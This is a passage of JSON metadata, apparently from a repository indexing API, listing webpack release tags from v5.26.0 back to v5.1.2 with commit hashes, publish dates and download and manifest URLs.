.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d4